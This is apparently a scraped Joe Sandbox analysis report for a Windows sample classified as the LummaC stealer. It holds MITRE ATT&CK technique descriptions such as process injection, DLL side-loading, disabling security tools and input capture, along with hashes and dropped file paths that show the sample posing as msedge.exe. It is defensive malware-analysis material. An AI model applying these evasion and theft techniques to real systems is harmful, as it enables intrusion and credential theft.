Associated: 00000000.00000002.2709168627.00007FF7865E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709233596.00007FF786630000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709266644.00007FF78665E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709291812.00007FF78665F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709321152.00007FF786679000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2709346890.00007FF78667B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7865e0000_seoI30IZZr.jbxd

Similarity

API ID: memcpy$freemalloc
String ID:
API String ID: 3313557100-0
Opcode ID: d8f929feb02f49bec9ceb830092e7ed25e04814ece36a7521f167546b7acc7a9
Instruction ID: 459397bc9caecc0f7d3b474e1121a543a4d05d12513ee7ddd967a47ce0ae3535
Opcode Fuzzy Hash: d8f929feb02f49bec9ceb830092e7ed25e04814ece36a7521f167546b7acc7a9
Instruction Fuzzy Hash: 0131C072B05AC1A6FE049F46E9441AAA361FB88B80B988436DF5D87750DF3CE891C740

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report seoI30IZZr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Edge\61a52ddc9dd915

C:\Edge\L6lFlVnd0szYUYb26bZc.vbe

C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat

C:\Edge\msedge.exe

C:\Program Files (x86)\Microsoft\Edge\Application\CSC1C202AE04657426D812F38F5265327B.TMP

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

C:\Users\user\AppData\Local\24dbde2999530e

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\msedge.exe.log

Windows Analysis Report
seoI30IZZr.exe

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre